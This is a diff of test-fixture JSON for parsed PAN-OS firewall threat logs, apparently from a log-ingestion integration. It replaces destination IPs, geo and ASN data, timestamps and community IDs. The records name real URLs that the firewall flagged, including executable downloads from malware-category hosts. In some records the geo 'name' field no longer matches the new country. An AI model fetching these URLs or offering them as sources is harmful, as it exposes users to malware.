@@ -1991,14 +1977,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545405950Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11\u0026parameter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079065600Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11\u0026parameter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2021,26 +2007,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -2056,7 +2041,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -2098,7 +2083,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AEtFqIuwxZ9TQ3w9m74nOrboCXE=", + "community_id": "1:vCMdT6zPx0277mqoTE2FybOH35w=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -2135,14 +2120,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545417378Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079071400Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2165,26 +2150,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -2200,7 +2184,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -2242,7 +2226,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AuQEAPptnfXLW8oL/ac3CM4Gnnw=", + "community_id": "1:koetsWC4zZQTKrn1+nSjU/gkrDc=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -2279,14 +2263,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545426274Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079077300Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2309,23 +2293,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Germany", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 - }, - "country_iso_code": "DE" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 28753, + "number": 4837, "organization": { - "name": "Leaseweb Deutschland GmbH" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "78.159.99.224" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -2341,7 +2327,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,78.159.99.224,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,\"findmorepill.com/klik/search.php?q=xxx\",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,\"findmorepill.com/klik/search.php?q=xxx\",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0,", "panw": { "panos": { "ruleset": "rule1", @@ -2382,7 +2368,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:v73LbTZDPLO+1dzNRixeZAmolJ0=", + "community_id": "1:oDY9jf8hdgOlTemZLRLtdPEwuRY=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -2418,14 +2404,14 @@ ], "ip": [ "192.168.0.2", - "78.159.99.224", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545433899Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,78.159.99.224,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,\"findmorepill.com/klik/search.php?q=xxx\",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0,", + "ingested": "2021-12-09T13:42:59.079083200Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,\"findmorepill.com/klik/search.php?q=xxx\",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0,", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2448,26 +2434,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -2483,7 +2468,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -2525,7 +2510,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:IRI0j5xLyLhwaONpy7gVZdl/Qow=", + "community_id": "1:qI6GZCcTdUKaf6uoJvk4RiEYMoc=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -2562,14 +2547,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545449282Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079089Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2592,26 +2577,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -2627,7 +2611,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -2669,7 +2653,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:/tG+YfZ8qFKrUDfQ7EThCBXci9Y=", + "community_id": "1:euxf4A6kWeWGJu6MuGDs2l85ugI=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -2706,14 +2690,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545457130Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079095Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2736,26 +2720,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -2771,7 +2754,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -2813,7 +2796,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Vfi4CxQayypb3DoxclNfeNjXdjo=", + "community_id": "1:SdTb469tRCABgoEEDDEw1DSQQHs=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -2850,14 +2833,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545464519Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079100900Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2880,26 +2863,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -2915,7 +2897,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -2957,7 +2939,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2UbFMV1DsXMB0b/AUotNCCsHm0s=", + "community_id": "1:77gDm3uChN5sMPF96tsLJjK6Bc4=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -2994,14 +2976,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545471606Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079106700Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -3024,26 +3006,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -3059,7 +3040,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3101,7 +3082,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:M8DHGZjrHyuCRpC9MNNfDUke5g4=", + "community_id": "1:MRL6gXI2+bPHjOwl6jUcT9qzDE4=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -3138,14 +3119,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545478662Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079112600Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -3168,26 +3149,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -3203,7 +3183,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3245,7 +3225,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AVMiOufq2owuhWpcu/TfRJ38tv4=", + "community_id": "1:g+OW2rFxOQFbjQiQ/fw145Cfric=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -3282,14 +3262,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545485862Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079116800Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": 